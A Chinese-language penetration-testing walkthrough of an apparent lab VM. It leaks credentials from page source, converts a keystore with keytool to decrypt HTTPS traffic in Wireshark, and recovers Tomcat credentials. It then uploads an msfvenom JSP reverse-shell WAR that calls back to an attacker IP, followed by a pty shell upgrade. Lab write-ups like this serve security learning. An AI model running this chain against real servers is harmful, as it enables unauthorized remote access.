一、瀏覽器訪問192.168.110.140
二、點擊圖片,進入後臺
三、點擊Employee portal進入登錄後臺
四、發現需要登錄密碼,接下來就是獲得密碼
按F12打開開發者模式,發現旁註裏有解密後的用戶和密碼,用base64解碼,得到用戶和密碼
五、登錄進去之後,我們開始進行信息收集,我們發現了兩條有用的信息
通過這個網址,我們下載下來了一個證書,生成的密鑰文件 因爲他是一個瀏覽器的認證所以解不開
通過這個網址我們得到了一個pcap流量包,截取***的流量包 我是在百度開始搜索nginx生成ssl證書 下面會介紹
六、我們來分析該流量,我們將流量包放在wireshark上,發現因爲是https協議,所以都是密文的,我們無法得到什麼信息
七、所以我們得想辦法將其變成明文的,方便我們收集信息,這就是我們接下來的任務,我們首先知道剛纔下載了一個keystore的證書,我們試着將這個證書導到wireshark中,看看可不可以,嘗試過後發現不可以,流量還是密文的,後來我們知道應該講證書轉化成p12格式纔可以被解析,那接下來我們來操作這步
首先我們把keystore傳到moba上,然後在kali上敲
keytool -importkeystore -srckeystore /root/keystore -destkeystore /root/nima.p12 -deststoretype PKCS12 -srcalias tomcat
得到了一個nima.p12的證書,接下來我們將這個證書導到wireshark上
8443可能是https協議所以設值爲他
(這一步得打個註釋:我這裏選的是TLS,因爲是老版,新版的話直接選SSL就可以了) 解完包會變成http格式
(這裏也得強調一下,這裏這個IP地址寫的不是目的地址,而是自己的主機IP,協議要寫http,而不是https)
八、最後點擊ok就導入完成了,這時我們發現流量多了http的流量,我們去追它http流,發現是明文的了,401代表登陸失敗 可以判斷出穿的***
九、那我們現在可以開始收集信息了,我們在上面看到401,需要登錄,往下翻發現有200狀態碼,說明登錄成功了,那我們往上看,肯定有賬號密碼,然後我們發現了被加密過了的賬號和密碼,我們將其複製去解碼器中解碼,得到了賬號和密碼 tomcat:Tt\5D8F(#!*u=G)4m7zB
十、接下來我們去找這個需要登錄的tomcat的頁面,我們去分析它的流量找到了這個網址
發現從192.168.110.129到192.168.110.140的***流量包,其中有cmd命令馬執行了id命令,***者上傳了兩張圖片,疑似圖片馬,但是命令馬無法直接訪問,需要登錄tomcat後臺:
十一、接下來我們去瀏覽器訪問該網址,發現無法訪問,因爲我們沒有相應的證書,它有限制,我們新版的瀏覽器都不允許訪問
但我們知道burp上也有各種證書,所以我們掛上代理,用burp代理放包,達到訪問的目的
放包之後發現出現了登錄框,我們輸入上面得到的賬號和密碼
放包,發現了tomcat的頁面
我們向上面傳***,用msf生成***
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.189 lport=8989 -f war -o shandian.war
爲了不用一次次的放包,我們現在直接設置成不攔截
然後訪問***,這邊kali上監聽
最後得到權限
我們可以使用 python -c 'import pty;pty.spawn("/bin/bash")' 使其有bash模式
還可以使用 id 看我們當前的權限 爲tomcat6(普通用戶權限)